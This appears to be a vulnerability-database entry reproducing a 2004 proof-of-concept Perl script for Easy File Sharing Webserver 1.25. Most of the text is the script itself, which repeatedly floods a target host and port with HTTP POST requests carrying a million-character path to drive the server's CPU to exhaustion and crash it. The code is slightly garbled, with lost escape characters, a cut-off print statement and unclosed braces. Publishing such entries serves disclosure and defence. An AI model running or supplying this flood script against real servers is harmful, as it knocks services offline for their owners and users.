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Easy File Sharing Webserver 1.25 Denial of Service Exploit

🗓️ 27 Aug 2004 00:00:00Reported by GulfTech SecurityType 

Denial of Service exploit for Easy File Sharing Webserver 1.25 causing high CPU usage.

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Easy File Sharing Webserver 1.25 Denial of Service Exploit

# Easy File Sharing Webserver v1.25 Denial Of Service 
# Proof Of Concept Code By GulfTech Security Research 
# Easy File Sharing Webserver v1.25 will consume 99% 
# of CPU usage until it crashes when sent large req's 

use IO::Socket; 

print "=====================================================n". 
      " Easy File Sharing Webserver v1.25 Denial Of Service n". 

unless (@ARGV > 1) { die("usage: host port"); } 

my $remote_host = $ARGV[0]; 
my $remote_port = $ARGV[1]; 
my $done = "15121512"; 
my $buff = "A" x 1000000; 
my $post = "POST /".$buff." HTTP/1.0 ".$done; 

print "
DoS'ing Server $remote_host Press ctrl+c to stopn"; 

while ($post) { 
for (my $i=1; $i<10; $i++) { 
my $i = IO::Socket::INET->new( Proto => "tcp", 
      PeerAddr   => $remote_host, 
  PeerPort   => $remote_port, 
      Timeout   => '10000', 
      Type       => SOCK_STREAM, 
      ) || die("
Server Is Dead!"); 

print $i $post; 
close $i; 

# [2018-01-06]  #

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27 Aug 2004 00:00Current
7High risk
Vulners AI Score7